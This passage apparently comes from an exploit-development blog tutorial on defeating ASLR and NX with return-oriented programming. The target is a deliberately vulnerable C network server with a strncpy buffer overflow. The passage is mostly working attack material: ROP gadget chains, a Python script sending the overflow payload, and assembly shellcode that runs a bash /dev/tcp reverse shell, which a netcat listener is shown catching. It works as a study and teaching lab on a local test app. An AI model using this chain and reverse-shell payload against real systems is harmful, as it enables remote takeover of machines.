bfba6000-bfbc7000 rw-p 00000000 00:00 0          [stack]

There are 2 sections of wriable memory that appear to be static (080cc000-080cd000 and 080ca000-080cc000).

As you can see though, these address ranges have low memory addresses, much smaller than the value added to ebx (0x5e5b04c4).

I decided I wanted to use the memory address of 0x080cc004, so I done the sum 0x1080cc004 - 0x5e5b04c4 = 0xa9b1bb40.

So if we get the value 0xa9b1bb40 into ebx before we run the gadget in question it should work all of the time.

With all of this in mind our new function 1 looks like this:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
0x080a3f72 : xchg eax, edi ; ret
0x080a8576 : pop eax ; ret
0xaaaaaaaa : value to subtract
0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x080c0f18 : xchg eax, edi ; xchg eax, esp ; ret
0x080a3f72 : xchg eax, edi ; ret
0x08099c0f : xor eax, eax ; ret
0x0807629e : add eax, ecx ; ret
0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x080a3f72 : xchg eax, edi ; ret
0x08057b7e : pop ebx ; ret
0xa9b1bb40 : 0x1080cc004 - 0x5e5b04c4
0x080ab696 : xchg edx, edi ; inc dword ptr [ebx + 0x5e5b04c4] ; pop ebp ; ret
0xeeeeeeee
0x0807b086 : xchg eax, esp ; ret

Obviously this is smaller than the original function 1 meaning that the distance between function 1 and 2 will be smaller, in fact it is only 76 (or 0x4c) bytes now instead of 108.

Using the same method as before (attaching to the app using gdb and running find 0x08048000, 0x080ca000, 0x0000004c) I found that this value is found at the address 0x804ba61.

So we have to go about replacing those where ever we have called function 2 directly.

All of this increased the size of the payload from 1008 to 1188 bytes but that's still a lot smaller than the 1536 bytes of the previous exploit.

Exploiting The Application

So now we have all the required information to make a working exploit.

You can see my full notes here.

And the full exploit here.

As normal we run the vulnerable application:

1
appuser@dev:~$ ./app-net

Start listening with nc:

1
testuser@dev:~$ nc -l -p 8000

Launch the exploit:

1
testuser@dev:~$ python app-net-rop-exploit-improved.py

Then if you look at the terminal windows running nc:

1
2
3
4
5
6
7
appuser@dev:/home/appuser$ pwd
pwd
/home/appuser
appuser@dev:/home/appuser$ whoami
whoami
appuser
appuser@dev:/home/appuser$

PWNED!! :-D

Conclusion

I know we didn't save a huge amount of space with this exploit (only 348 bytes), that might be enough to bypass any space restrictions.

Also if we had more/different gadgets, which is certainly possible with a different application, we might have been capable of saving a lot more space.

The main point of this post was the demonstrate some reasonably advanced ROP techniques and suggest possibilities for improving an exploit where ROP is required.

Happy Hacking :-)

Beating ASLR and NX using ROP

So far we've only beat either ASLR or NX seperately, now I will demonstrate how to beat both of these protections at the same time.

To do this I will use ROP (Return-oriented programming). We've seen ROP briefly in the last post but now we will use it alot more extensively.

ROP itself is a very simple idea, in situations where its impossible to run your own code, you use the code already in the application to do what you want it to do.

As we saw in the post about beating ASLR with full ASLR enabled the only section that is static is the text segment which contains the applications own code.

The "Return to Libc" method won't work because dynamically loaded libraries aren't at the same segment of memory as the applications code so we can no longer predict what memory addresses these functions (or pointers to the functions) will be at.

Normal shellcode will not run because NX is enabled.

So we have to find a way to run our own code by using only the code which is always loaded at the same address in memory.

Its worth noting that every ROP exploit will be remarkably different, this is because we can only use the applications own code and every applications code is different, so the important thing to learn in this post is the methodlogy that I will use to build the exploit.

I will assume that you have an indepth knowledge of the IA32 architecture and how the calling convention used by Linux (cdecl) works.

The App

The application we will be attacking is the same application as in the beating ASLR post.

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
#include <sys/socket.h>
#include <netinet/in.h>
#include <stdio.h>
#include <strings.h>
#include <stdlib.h>
#include <string.h>

#define PASS "topsecretpassword"
#define CNUM 58623
#define SFILE "secret.txt"
#define TFILE "token"
#define PORT 9999

void sendfile(int connfd, struct sockaddr_in cliaddr);
void senderror(int connfd, struct sockaddr_in cliaddr, char p[]);
void sendtoken(int connfd, struct sockaddr_in cliaddr);
int checkpass(char *p);


void main()
{
    int listenfd, connfd, n, c, r;
    struct sockaddr_in servaddr, cliaddr;
    socklen_t clilen;
    pid_t childpid;
    char pwd[4096];

    listenfd=socket(AF_INET,SOCK_STREAM,0);

    bzero(&servaddr,sizeof(servaddr));
    servaddr.sin_family = AF_INET;
    servaddr.sin_addr.s_addr=htonl(INADDR_ANY);
    servaddr.sin_port=htons(PORT);
    if ((r = bind(listenfd,(struct sockaddr *)&servaddr,sizeof(servaddr))) != 0) {
        printf("Error: Unable to bind to port %d\n", PORT);
        exit(1);
    }

    listen(listenfd,1024);

    for(;;) {
        clilen=sizeof(cliaddr);
        connfd = accept(listenfd,(struct sockaddr *)&cliaddr,&clilen);

        n = recvfrom(connfd, pwd, 4096, 0, (struct sockaddr *)&cliaddr, &clilen);
        pwd[n] = '\0';
        r = checkpass(pwd);
        if (r != 0)
            if (r != 5)
                senderror(connfd, cliaddr, pwd);
            else
                sendtoken(connfd, cliaddr);
        else
            sendfile(connfd, cliaddr);
        printf("Received the following:\n");
        printf("%s", pwd);

        close(connfd);
    }
}

void sendfile(int connfd, struct sockaddr_in cliaddr)
{
    FILE *f;
    int c;
    f = fopen(SFILE, "r");
    if (f) {
        while ((c = getc(f)) != EOF)
            sendto(connfd, &c, 1, 0, (struct sockaddr *)&cliaddr,sizeof(cliaddr));
        fclose(f);
    } else {
        printf("Error opening file: " SFILE "\n");
        exit(1);
    }
}

void senderror(int connfd, struct sockaddr_in cliaddr, char p[])
{
    sendto(connfd, "Wrong password: ", 16 , 0, (struct sockaddr *)&cliaddr,sizeof(cliaddr));
    sendto(connfd, p, strlen(p), 0, (struct sockaddr *)&cliaddr,sizeof(cliaddr));
}

void sendtoken(int connfd, struct sockaddr_in cliaddr)
{
    FILE *f;
    int c;
    f = fopen(TFILE, "r");
    if (f) {
        while ((c = getc(f)) != EOF)
            sendto(connfd, &c, 1, 0, (struct sockaddr *)&cliaddr,sizeof(cliaddr));
        fclose(f);
    } else {
        printf("Error opening file: " TFILE "\n");
        exit(1);
    }
}

int checkpass(char *a)
{
    char p[512];
    int r, i;
    strncpy(p, a, strlen(a)+1);
    i = atoi(p);
    if (i == CNUM)
        r = 5;
    else
        r = strcmp(p, PASS);
    return r;
}

The only thing I've changed here is the size of the input accepted by the server (from 1000 to 4096). This is because the payload I need to send is larger than 1000 bytes.

Setting Up The Environment

Because the application that we are attacking is so small, we need to compile it with the -static flag, this will compile any libraries into the binary making for a larger text segment:

1
2
3
testuser@dev:~$ gcc -o app-net app-net.c -static
testuser@dev:~$ cat /proc/sys/kernel/randomize_va_space 
2

Its important to use the -static flag, firstly because you won't have enough ROP gadgets to write the exploit otherwise and because nearly all real world applications are much bigger than this small 1 so compiling it with the libraries static will make it more realistic.

If you don't get 2 from /proc/sys/kernel/randomize_va_space then run (as root):

1
root@dev:~# echo 2 > /proc/sys/kernel/randomize_va_space 

Getting Gadgets

To build a ROP exploit you need to find ROP gadgets.

A ROP gadget is 1 or more assembly instructions followed by a ret (or return) instruction.

Finding these gadgets would be painful and slow manually so we will use an already avaliable tool ROPgadget by Jonathan Salwan of Shell Storm.

You can download the tool using git:

1
2
3
4
5
6
testuser@dev:~$ git clone https://github.com/JonathanSalwan/ROPgadget.git
Cloning into 'ROPgadget'...
remote: Counting objects: 3031, done.
remote: Total 3031 (delta 0), reused 0 (delta 0)
Receiving objects: 100% (3031/3031), 10.08 MiB | 2.03 MiB/s, done.
Resolving deltas: 100% (1828/1828), done.

This script looks for all ROP gadgets in the application code and outputs them, there will be alot of output so redirect the output to a file to search through later:

1
testuser@dev:~$ ROPgadget/ROPgadget.py --binary app-net > gadgets

The file (gadgets) will contain lines in the form of:

[memory address] : [series of instructions at that address]

The first thing I looked for is an int 0x80 followed by a ret:

1
testuser@dev:~$ grep 'int 0x80' gadgets | grep 'ret'

There are none, this means we will have to do the attack in 1 syscall.

You can download the full list of ROP gadgets that I got here.

Testing New Shellcode

All of the shellcode I've written until now used multiple syscalls, we aren't able to do that now so we need 1 syscall that is useful for us.

To do this I will use the bash 1 liner here:

1
bash -i >& /dev/tcp/127.0.0.1/8000 0>&1

As before, although I'm doing everything over the loopback interface for ease and convenience, this could be done to any IP address.

I will use the execve syscall for this, in C this would look like:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
#include <unistd.h>

int main(int argc, char **argv)
{
    char *filename = "/bin/bash";
    char *arg1 = "-c";
    char *arg2 = "/bin/bash -i >& /dev/tcp/127.0.0.1/8000 0>&1";
    char *args[] = { filename, arg1, arg2 };
    execve(args[0], &args[0], 0);
}

Using this, and already knowing (from previous posts) that the syscall number for execve is 11, we can create the same code in assembly and shellcode, first we need the strings in hex and backwards (because of the little endian architecture).

For this I will use a little python script I wrote:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
#!/usr/bin/env python

import sys

string = sys.argv[1]
print 'Length: ' + str(len(string))

print 'Reversed: ' + string[::-1]

print 'And HEX\'d: ' + string[::-1].encode('hex')

sys.exit(0)

Now we can just run this script with each of our strings as an argument:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
testuser@dev:~$ python reverse-n-hex.py '/bin/bash'
Length: 9
Reversed: hsab/nib/
And HEX'd: 687361622f6e69622f
testuser@dev:~$ python reverse-n-hex.py '-c'
Length: 2
Reversed: c-
And HEX'd: 632d
testuser@dev:~$ python reverse-n-hex.py '/bin/bash -i >& /dev/tcp/127.0.0.1/8000 0>&1'
Length: 44
Reversed: 1&>0 0008/1.0.0.721/pct/ved/ &> i- hsab/nib/
And HEX'd: 31263e3020303030382f312e302e302e3732312f7063742f7665642f20263e20692d20687361622f6e69622f

Now we can build the shellcode in assembly:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
global _start

section .text

_start:
    ; zero eax for the nulls
    xor eax, eax
    ; free some space on the stack
    ; so we don't overwrite bits of our shellcode
    sub esp, 0x60
    ; setup the first argument string on the stack
    push eax
    push 0x68736162
    push 0x2f6e6962
    push 0x2f2f2f2f
    ; move the address of this string into ebx
    mov ebx, esp
    ; setup the third argument on the stack
    push eax
    push 0x31263e30
    push 0x20303030
    push 0x382f312e
    push 0x302e302e
    push 0x3732312f
    push 0x7063742f
    push 0x7665642f
    push 0x20263e20
    push 0x692d2068
    push 0x7361622f
    push 0x6e69622f
    ; move the address of the thrid argument string into esi for later
    mov esi, esp
    ; setup the second argument string on the stack
    push eax
    push word 0x632d
    ; move the address of the second argument string into edi for later
    mov edi, esp
    ; setup the "argv[]" argument on the stack
    push eax
    push esi
    push edi
    push ebx
    ; move the address of the "argv[]" argument into ecx
    mov ecx, esp
    ; setup edx to point to null
    push eax
    mov edx, esp
    ; move 11 into eax
    add al, 0xb
    ; initiate the syscall
    int 0x80

You can test this shellcode the way we have tested shellcode in the past, I won't do that because this post will be long enough anyway, just remember to use netcat to start listening because this will do a reverse shell connecting back to 127.0.0.1 on port 8000.

Searching Through The Gadgets

Now we know how the registers need to be setup when we execute the syscall we can go about searching through the avaliable gadgets to see what registers we have a lot of control of and what registers are more difficult to manipulate.

We can search the gadgets file with regex, like this:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
testuser@dev:~$ grep ' ecx, e[a-z][a-z]' gadgets | grep 'ret$'
0x08048207 : add eax, 0x80cb080 ; add ecx, ecx ; ret
0x0806cdbc : add ecx, eax ; mov eax, ecx ; pop ebx ; pop esi ; pop ebp ; ret
0x0804820c : add ecx, ecx ; ret
0x08056504 : and edx, 3 ; mov ecx, edx ; rep stosb byte ptr es:[edi], al ; pop edi ; pop ebp ; ret
0x080748f8 : cmp ecx, eax ; jb 0x8074910 ; sub eax, ebx ; pop ebx ; pop ebp ; ret
0x0806cdba : div ebx ; add ecx, eax ; mov eax, ecx ; pop ebx ; pop esi ; pop ebp ; ret
0x08056505 : loop 0x8056512 ; mov ecx, edx ; rep stosb byte ptr es:[edi], al ; pop edi ; pop ebp ; ret
0x0804dca2 : mov ecx, eax ; mov eax, dword ptr [eax] ; test eax, eax ; jne 0x804dca1 ; pop ebp ; ret
0x08056507 : mov ecx, edx ; rep stosb byte ptr es:[edi], al ; pop edi ; pop ebp ; ret
0x080748f7 : nop ; cmp ecx, eax ; jb 0x8074911 ; sub eax, ebx ; pop ebx ; pop ebp ; ret
0x0804820a : or al, 8 ; add ecx, ecx ; ret
0x08084b36 : or ecx, ecx ; ret
0x0804f539 : xor ecx, edi ; mov byte ptr [eax + edx], cl ; pop ebx ; pop esi ; pop edi ; pop ebp ; ret

The search above searches for any gadgets that use the ecx register as the source operand.

We also use grep 'ret$' at the end because we are only interested in gadgets that end with a ret instruction (it also shows gadgets that end in int 0x80 otherwise).

After searching through the gadgets for a while it becomes obvious that the ecx register is 1 of the more difficult to manipulate, so we will use the eax, ebx and edx registers to manipulate the data and we want to sort out the final value of ecx near the start of the exploit.

While searching through the gadgets, it would be helpful to paste what look to be the most useful gadgets into a seperate file so that you don't have to keep searching through the full list of gadgets.

Building The ROP Exploit

We are going to run into a few major problems while building this exploit.

Firstly, as I already mentioned ecx manipulation is highly restrictive.

Secondly, we are unable to send nulls (0x0) so we will need to put in placeholders and change their value in memory during runtime.

Lastly, we have no idea of any memory addresses within the payload that we will send, so we will have to calulate them during runtime also so that we can reference certain parts of our payload for various reasons.

Because our main 2 problems are to do with values within our payload and because we are unable to exploit this without being able to reference values within our payload we need to approach this problem first.

We do this by getting any address within our payload and calculating the rest of the addresses relative to that address.

The easiest way to do this is by getting the value of esp which, throughout our exploit, will point to a certain part of the payload.

There are various ways to do this (eg. by finding a mov [reg], esp, add [reg], esp) but we will use the following push, pop sequence to get the value of esp into ebp:

1
0x0807715a : push esp ; mov eax, dword ptr [0x80ccbcc] ; pop ebp ; ret

And then move the value of ebp into eax:

1
0x080525d0 : xchg eax, ebp ; ret

Because eax is the most used register in our avaliable ROP gadgets, its handy to be able to move values into eax for further processing.

Analysing The Exploit

Its important to analyse this exploit throughout the development of the exploit because of the complexity of it.

The methodology that I will use here you will need to use thoroughly while developing the exploit.

First we write a python exploit containing the 2 ROP gadgets we have found so far:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
#!/usr/bin/env python

import socket

payload = "A" * 532

payload += "\x5a\x71\x07\x08" # ebp = esp

payload += "\xd0\x25\x05\x08" # xchg eax, ebp

# create the tcp socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# connect to 127.0.0.1 port 9999
s.connect(("127.0.0.1", 9999))

# send our payload
s.send(payload)

# close the socket
s.close()

All this is doing is sending 532 A's to overflow the buffer until we start overwriting the return address.

Then we open the vulnerable application using gdb and run the exploit against it:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
appuser@dev:~$ gdb -q ./app-net
Reading symbols from /home/appuser/app-net...(no debugging symbols found)...done.
(gdb) set disassembly-flavor intel
(gdb) disassemble checkpass
Dump of assembler code for function checkpass:
   0x08048674 <+0>: push   ebp
   0x08048675 <+1>: mov    ebp,esp
   0x08048677 <+3>: sub    esp,0x228
   0x0804867d <+9>: mov    eax,DWORD PTR [ebp+0x8]
   0x08048680 <+12>:    mov    DWORD PTR [esp],eax
   0x08048683 <+15>:    call   0x8055600 <strlen>
   0x08048688 <+20>:    add    eax,0x1
   0x0804868b <+23>:    mov    DWORD PTR [esp+0x8],eax
   0x0804868f <+27>:    mov    eax,DWORD PTR [ebp+0x8]
   0x08048692 <+30>:    mov    DWORD PTR [esp+0x4],eax
   0x08048696 <+34>:    lea    eax,[ebp-0x210]
   0x0804869c <+40>:    mov    DWORD PTR [esp],eax
   0x0804869f <+43>:    call   0x80556b0 <strncpy>
   0x080486a4 <+48>:    lea    eax,[ebp-0x210]
   0x080486aa <+54>:    mov    DWORD PTR [esp],eax
   0x080486ad <+57>:    call   0x8048eb0 <atoi>
   0x080486b2 <+62>:    mov    DWORD PTR [ebp-0x10],eax
   0x080486b5 <+65>:    cmp    DWORD PTR [ebp-0x10],0xe4ff
   0x080486bc <+72>:    jne    0x80486c7 <checkpass+83>
   0x080486be <+74>:    mov    DWORD PTR [ebp-0xc],0x5
   0x080486c5 <+81>:    jmp    0x80486e0 <checkpass+108>
   0x080486c7 <+83>:    mov    DWORD PTR [esp+0x4],0x80ab924
   0x080486cf <+91>:    lea    eax,[ebp-0x210]
   0x080486d5 <+97>:    mov    DWORD PTR [esp],eax
   0x080486d8 <+100>:   call   0x80555c0 <strcmp>
   0x080486dd <+105>:   mov    DWORD PTR [ebp-0xc],eax
   0x080486e0 <+108>:   mov    eax,DWORD PTR [ebp-0xc]
   0x080486e3 <+111>:   leave  
   0x080486e4 <+112>:   ret    
End of assembler dump.
(gdb) break *0x080486e4
Breakpoint 1 at 0x80486e4
(gdb) define hook-stop
Type commands for definition of "hook-stop".
End with a line saying just "end".
>x/10xw $esp
>x/i $eip
>end
(gdb) display/x $ebp
(gdb) display/x $eax
(gdb) run
Starting program: /home/appuser/app-net 
0xbfffe73c: 0x0807715a  0x080525d0  0xbfffe700  0x00001000
0xbfffe74c: 0x00000000  0xbffff770  0xbffff76c  0x00000000
0xbfffe75c: 0x00000000  0x00000000
=> 0x80486e4 <checkpass+112>:   ret    

Breakpoint 1, 0x080486e4 in checkpass ()
2: /x $eax = 0xffffffcd
1: /x $ebp = 0x41414141
(gdb)

Firstly, on line 4, I disassemble the checkpass function, this is the vulnerable function so our exploit gets triggered when this function returns (runs its ret instruction).

We need to set a breakpoint at the address of this ret instruction (0x080486e4 on line 34 and set on line 36) so that we can trace through and observe the values of the registers as our exploit runs.

Lines 38 to 43, I define a function that runs every time execution stops, this just give us the top 10 values on the stack (as referenced by esp) and the current instruction to be run (as referenced by eip).

Next, on lines 44 and 45, I instruct gdb to display the values of the ebp and eax registers, this will also run every time execution stops, these are the 2 registers we are manipulating with our first 2 gadgets.

Lastly I run the application and when I launch the exploit breakpoint 1 is reached (on line 53).

As you can see, from line 51, eip now points to the ret instruction at the end of the checkpass function, which is where our exploit begins.

The current values of eax and ebp are 0xffffffcd and 0x41414141 respectively.

Looking at the output of x/10xw $esp, which just prints the top 10 values on the stack, the first value is 0x0807715a (just the address of our first gadget) and the second is 0x080525d0 (which is the address of our second gadget).

After the second gadget is run eax should contain 0xbfffe740 (0xbfffe73c + 0x4).

Now we just trace through the next few instructions using the stepi gdb command:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
(gdb) stepi
Cannot access memory at address 0x41414145
(gdb) stepi
0xbfffe73c: 0xbfffe740  0x080525d0  0xbfffe700  0x00001000
0xbfffe74c: 0x00000000  0xbffff770  0xbffff76c  0x00000000
0xbfffe75c: 0x00000000  0x00000000
=> 0x807715b <__tzname_max+59>: mov    eax,ds:0x80ccbcc
0x0807715b in __tzname_max ()
2: /x $eax = 0xffffffcd
1: /x $ebp = 0x41414141
(gdb) stepi
0xbfffe73c: 0xbfffe740  0x080525d0  0xbfffe700  0x00001000
0xbfffe74c: 0x00000000  0xbffff770  0xbffff76c  0x00000000
0xbfffe75c: 0x00000000  0x00000000
=> 0x8077160 <__tzname_max+64>: pop    ebp
0x08077160 in __tzname_max ()
2: /x $eax = 0x0
1: /x $ebp = 0x41414141
(gdb) stepi
0xbfffe740: 0x080525d0  0xbfffe700  0x00001000  0x00000000
0xbfffe750: 0xbffff770  0xbffff76c  0x00000000  0x00000000
0xbfffe760: 0x00000000  0x00000000
=> 0x8077161 <__tzname_max+65>: ret    
0x08077161 in __tzname_max ()
2: /x $eax = 0x0
1: /x $ebp = 0xbfffe740
(gdb) stepi
0xbfffe744: 0xbfffe700  0x00001000  0x00000000  0xbffff770
0xbfffe754: 0xbffff76c  0x00000000  0x00000000  0x00000000
0xbfffe764: 0x00000000  0x00000000
=> 0x80525d0 <_int_malloc+2832>:    xchg   ebp,eax
0x080525d0 in _int_malloc ()
2: /x $eax = 0x0
1: /x $ebp = 0xbfffe740
(gdb) stepi
0xbfffe744: 0xbfffe700  0x00001000  0x00000000  0xbffff770
0xbfffe754: 0xbffff76c  0x00000000  0x00000000  0x00000000
0xbfffe764: 0x00000000  0x00000000
=> 0x80525d1 <_int_malloc+2833>:    ret    
0x080525d1 in _int_malloc ()
2: /x $eax = 0xbfffe740
1: /x $ebp = 0x0
(gdb)

So this worked as expected and we now have the address of our second ROP gadget inside eax.

All other addresses can be worked our relative to the address that we currently have.

Calculating An Address

The data that we need to reference we will put at the end of our payload.

Once we have the exploit almost complete we will know the length of our payload but until then we will write the exploit with an arbirary value and change it later.

For this we will use 1000 as the length from the second ROP gadget (the address we just retrieved from esp) to the start of our data.

Next we have to figure out how we will arrange the data at the end of the payload, this will allow us to work out the distances between the different sections of data so that the only value that will need to be changed is the first that we calculate. This will become more clear as we develop more of the exploit.

We need 4 different parts in the data section, the 3 strings and the pointers for the second argument to execve.

Here is how I've laid out the data:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
------------------------data------------------------
------------------------strings---------------------
0x2f2f2f2f : ////bin/bash
0x2f6e6962
0x68736162
0xffffffff
--------------------------------------------------
0x632dffff : -c
0xffffffff
--------------------------------------------------
0x6e69622f : /bin/bash -i >& /dev/tcp/127.0.0.1/8000 0>&1
0x7361622f
0x692d2068
0x20263e20
0x7665642f
0x7063742f
0x3732312f
0x302e302e
0x382f312e
0x20303030
0x31263e30
0xffffffff
-------------------------pointers-------------------
0xbbbbbbbb : pointer to ////bin/bash
0xcccccccc : pointer to -c
0xdddddddd : pointer to args
0xffffffff

I've used 0xffffffff to represent where we want null bytes, these will have to be overwritten during runtime. We will also need to overwrite the pointers with the correct values at runtime, for now I've just put the placeholders 0xbbbbbbbb, 0xcccccccc and 0xdddddddd so that we can easily tell where we are while debugging the exploit.

It's also worth noting that because we are writing up the stack from lower down, the strings will be in normal order, there is no need to think about little endianness for them.

There is technically no reason to use ////bin/bash instead of /bin/bash here, like there was when writing the shellcode, but it rounds this up to 4 bytes so addresses will be slightly easier to calculate (this is 1 place this exploit could be optimized to reduce the size).

Now we need to calculate the address of the last value in our data (0xffffffff at the bottom)

There are 22 double words (a double word is 4 bytes) in the data, so 22 * 4 = 88, therefore we have 88 bytes from the top of our data to the end, as we are using 1000 bytes as a placeholder, for the length from the address we currently have to the top of the data, there are 1088 bytes we need to add to the address we got from esp in our first gadget.

Because we can't use nulls in our payload we have to calculate 1088 at runtime, we can do this using only eax and ebx, but first we have to move the value we currently have in eax, we'll move it to edx using this gadget:

1
0x080a820e : mov edx, eax ; pop esi ; mov eax, edx ; pop edi ; pop ebp ; ret

Along with moving the value in eax to edx, it pops 3 values off of the stack, we need to deal with this because if we put another gadget directly below this 1 it will be popped off into a register and will not be used.

We will use 0xeeeeeeee to represent junk values that will be popped off the stack but not used.

To calculate 1088 without using null bytes we will use 0xaaaaaaaa and substract the relevent number, to find out that number we do 0xaaaaaaaa - 1088 = 0xaaaaa66a.

We can subtract 2 values in eax and ebx using the following gadget:

1
0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret

And we can use the following 2 gadgets to get the required values into eax and ebx respectively:

1
2
0x080a8576 : pop eax ; ret
0x08057b7e : pop ebx ; ret

Here I think is a good time to mention the importance of keeping notes while you are creating this exploit, here are my notes so far:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
0x0807715a : push esp ; mov eax, dword ptr [0x80ccbcc] ; pop ebp ; ret
0x080525d0 : xchg eax, ebp ; ret
0x080a820e : mov edx, eax ; pop esi ; mov eax, edx ; pop edi ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee
0xeeeeeeee
---------------------------- edx contains address of 0x080525d0
---------------------------- time to calculate the distance to the end of data
0x080a8576 : pop eax ; ret
0xaaaaaaaa : value to subtract
0x08057b7e : pop ebx ; ret
0xaaaaa66a : (0xaaaaaaaa - (1000 + 88)) = distance to end of data
0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
---------------------------- eax contains the distance to the end of data

#################DATA##################

------------------------strings---------------------
0x2f2f2f2f : ////bin/bash
0x2f6e6962
0x68736162
0xffffffff
--------------------------------------------------
0x632dffff : -c
0xffffffff
--------------------------------------------------
0x6e69622f : /bin/bash -i >& /dev/tcp/127.0.0.1/8000 0>&1
0x7361622f
0x692d2068
0x20263e20
0x7665642f
0x7063742f
0x3732312f
0x302e302e
0x382f312e
0x20303030
0x31263e30
0xffffffff
-------------------------pointers-------------------
0xbbbbbbbb : pointer to ////bin/bash
0xcccccccc : pointer to -c
0xdddddddd : pointer to args
0xffffffff

It's worth noting that to get to a lower value in our payload we need to increase the address and if we want to get to a higher value we need to decrease the address. This is a very important point!

Knowing this, to get to the end of the data from the higher up address we received earlier from esp, we need to add the address to the distance we just calculated.

We can do the addition to calculate the address that we want using this gadget:

1
0x080732ab : add eax, ebx ; pop ebx ; pop ebp ; ret

This will add eax and ebx and store the result in eax.

First we need to move the value from eax into ebx, for that we can use this gadget:

1
0x080535be : push eax ; pop ebx ; pop esi ; pop ebp ; ret

And then move the address stored in edx (the first address we retrieved from esp) into eax:

1
0x0807abcc : mov eax, edx ; ret

If we put all of these together (while remembering to include junk values for the irrelevant pop instructions contained within the gadgets) we get:

1
2
3
4
5
6
7
0x080535be : push eax ; pop ebx ; pop esi ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x0807abcc : mov eax, edx ; ret
0x080732ab : add eax, ebx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop

eax will now contain the address of the end of our data.

If you look again at the data you will realise that this address should contain nulls (its the last lot of 0xffffffff right at the end of our payload).

As we have this address we should go ahead and write nulls here so we don't have to worry about it later.

We can write whatever is stored in the eax register to an address stored in the edx register using this gadget:

1
0x08083f21 : mov dword ptr [edx], eax ; ret

Before we can do that we need to move the address from eax into edx:

1
0x080a820e : mov edx, eax ; pop esi ; mov eax, edx ; pop edi ; pop ebp ; ret

And we need to put 0 into eax:

1
0x08099c0f : xor eax, eax ; ret

Using all of this knowledge our notes should look like this (again bear in mind the junk values we need to insert):

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
0x0807715a : push esp ; mov eax, dword ptr [0x80ccbcc] ; pop ebp ; ret
0x080525d0 : xchg eax, ebp ; ret
0x080a820e : mov edx, eax ; pop esi ; mov eax, edx ; pop edi ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee
0xeeeeeeee
---------------------------- edx contains address of 0x080525d0
---------------------------- time to calculate the distance to the end of data
0x080a8576 : pop eax ; ret
0xaaaaaaaa : value to subtract
0x08057b7e : pop ebx ; ret
0xaaaaa66a : (0xaaaaaaaa - (1000 + 88)) = distance to end of data
0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
---------------------------- eax contains the distance to the end of data
0x080535be : push eax ; pop ebx ; pop esi ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x0807abcc : mov eax, edx ; ret
0x080732ab : add eax, ebx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
---------------------------------------------------- eax contains the address of end of data
0x080a820e : mov edx, eax ; pop esi ; mov eax, edx ; pop edi ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x08099c0f : xor eax, eax ; ret
0x08083f21 : mov dword ptr [edx], eax ; ret

#################DATA##################

------------------------strings---------------------
0x2f2f2f2f : ////bin/bash
0x2f6e6962
0x68736162
0xffffffff
--------------------------------------------------
0x632dffff : -c
0xffffffff
--------------------------------------------------
0x6e69622f : /bin/bash -i >& /dev/tcp/127.0.0.1/8000 0>&1
0x7361622f
0x692d2068
0x20263e20
0x7665642f
0x7063742f
0x3732312f
0x302e302e
0x382f312e
0x20303030
0x31263e30
0xffffffff
-------------------------pointers-------------------
0xbbbbbbbb : pointer to ////bin/bash
0xcccccccc : pointer to -c
0xdddddddd : pointer to args
0xffffffff

Now would be a good time to test the exploit again, what we will do here is pad the rest of the exploit so that our data starts 1000 bytes after our second ROP gadget, this way we can see if our exploit is calculating the correct values.

Here is the updated exploit:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
